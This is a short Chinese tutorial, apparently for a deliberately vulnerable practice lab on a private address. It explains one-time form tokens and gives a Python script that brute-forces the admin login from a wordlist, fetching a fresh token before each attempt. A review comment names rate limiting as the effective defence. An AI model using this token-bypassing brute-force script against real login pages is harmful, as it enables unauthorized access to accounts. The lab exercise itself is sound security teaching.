token 的原理是：在前端生成 token 值，然后返回给服务端；之后用户提交表单时，把 token 一并提交给服务端进行比对。token 是一次性的，用过一次就重新随机生成一个，因此每次提交表单前都需要重新请求一次页面来获取新的 token。
请求头（headers）中一定要带上 User-Agent 与 cookie！！！
import requests
url = "http://192.168.152.128:8001/vul/burteforce/bf_token.php"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36",
    "cookie": "PHPSESSID=h2bkgcml7vdu8e84qnp59legc6",
}

# Prefix of the hidden form field that carries the token, and the number of
# characters read after it. The length is that of one sample value taken from
# the page, so the script assumes every token has exactly this many characters.
TOKEN_MARKER = '<input type="hidden" name="token" value="'
TOKEN_LENGTH = len("6384366f7641e94051799990589")


def _read_token(html):
    """Return the token embedded in the login form's hidden input.

    Raises ValueError (from str.index) when the marker is absent from
    *html*, which stops the script instead of posting without a token.
    """
    start = html.index(TOKEN_MARKER) + len(TOKEN_MARKER)
    return html[start:start + TOKEN_LENGTH].strip()


# One candidate password per line of the file named at the prompt.
with open(input("Passwd_File_Path >> "), "r") as wordlist:
    for candidate in wordlist:
        password = candidate.strip()
        # A fresh GET precedes every POST: the form token is single-use, so
        # the current one has to be read from the page each time.
        # NOTE(review): because each attempt first fetches a new token from the
        # same form, the token by itself does not appear to limit attempts here;
        # attempt-rate limiting or account lockout is the server-side control
        # that would.
        page = requests.get(url=url, headers=headers)
        form = {
            "username": "admin",
            "password": password,
            "token": _read_token(page.text),
            "submit": "Login",
        }
        result = requests.post(url=url, headers=headers, data=form)
        if "login success" in result.text:
            print(f"login: admin\npasswd: {password}")
            break